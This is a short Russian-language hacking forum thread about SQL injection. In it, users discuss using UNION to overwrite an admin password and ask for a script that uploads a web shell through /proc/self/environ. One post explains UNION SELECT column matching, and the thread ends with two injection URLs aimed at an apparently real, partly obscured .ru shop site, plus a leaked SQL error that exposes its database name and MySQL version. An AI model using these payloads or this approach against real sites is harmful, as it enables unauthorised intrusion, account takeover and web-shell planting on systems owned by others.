только select

спс, ясн, я так понял это зависит от левой части запроса.
т.е. если бы был запрос таким UPDATE SET bla bla WHERE bla=$_GET[bla] то тогда можно бы было обновить БД
так UPDATE SET bla bla WHERE bla=$_GET[bla]+UNION UPDATE set admin_pass=admin

я правильно понял?

п.с. я помню ты скинул давно был мне скрипт для залития аплоадера через /proc/self/environ я бы был искренее благодарен если бы ты его выложил ещё раз плиз

Да, но насчет union update точно не уверен, возможна ли такая конструкция - мельком глянул мануал об этом не написано.

ps про аплоадер в личку отписал

Итак, команда UNION используется для обьединения вывода двух или более запросов SELECT.
Особенности команды которые придется учитывать:
Когда два (или более) запроса подвергаются объединению, их столбцы вывода должны
быть совместимы для объединения. Это означает, что каждый запрос должен
указывать одинаковое количество столбцов и в том же порядке и каждый должен
иметь тип, совместимый с каждым.
Также данная возможность появилать только в mysql версии 4.0 т.е. на более
ранних версиях БД работать не будет.
Вид команды таков:
SELECT a1, a2, a3 FROM table1 UNION SELECT b1, b2, b3 FROM table2;
Где a1 и b1, a2 и b2, a3 и b3 должны быть одинакового типа.
Например:
SELECT text11, text12, int11 FROM t1 UNION SELECT text21, text22, int22 FROM t2;

http://wwwsdfsdfsdfsd.e-amwsfsdfsdfsdfay.ru/index.php?id=3)+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+

http://www.e-sfsdfsdfsdfamway.ru/index.php?id=-3)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+--+

SQL: SELECT fullname FROM `b10780_eamway`.etomite_user_attributes WHERE `b10780_eamway`.etomite_user_attributes.id = 5.0.67